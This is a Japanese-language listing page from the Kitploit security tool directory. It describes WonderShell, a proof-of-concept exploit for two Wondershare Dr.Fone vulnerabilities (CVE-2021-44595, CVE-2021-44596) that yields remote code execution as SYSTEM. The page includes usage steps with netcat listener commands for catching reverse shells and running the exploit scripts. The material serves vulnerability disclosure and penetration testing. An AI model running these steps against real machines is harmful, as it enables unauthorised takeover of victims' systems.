Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
WonderShell — Wondershare Dr.Fone の脆弱性 CVE-2021-44595 および CVE-2021-44596 に対する Proof-of-Concept エクスプロイト。脆弱なサービスを介して SYSTEM としてリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/netanelc305/wondershell
特権昇格エクスプロイトペネトレーションテスト
GitHubnetanelc305/wondershell

WonderShell

Wondershare Dr.Fone の脆弱性 CVE-2021-44595 および CVE-2021-44596 に対する Proof-of-Concept エクスプロイト。脆弱なサービスを介して SYSTEM としてリモートコード実行を可能にします。

リポジトリを見る
324年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WonderShell - CVE - 2021-44595 | CVE - 2021-44596

発見者

BugSec のセキュリティ研究者である Netanel Cohen と Tomer Peled。

説明

Wondershare Dr.Fone を悪用する POC の例。
Dr.Fone は wondershare が開発したフォントールキットであり、RCE に対して脆弱です。
ネットワークアクセスのみで、SYSTEM ユーザーとしてリモートコードを実行することができます。

脆弱なサービス:

InstallAssistService.exe
ElevationService.exe

テスト済みバージョン: 12.0.7、11.4

使用方法

IP とポートを変更して実行します。

root@kitploit:~
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
root@kitploit:~
nc -lvnp 1337
./InstallAssistServiceRCE.py

公開情報

https://medium.com/@tomerp_77017/wondershell-a82372914f26

ツールをダウンロード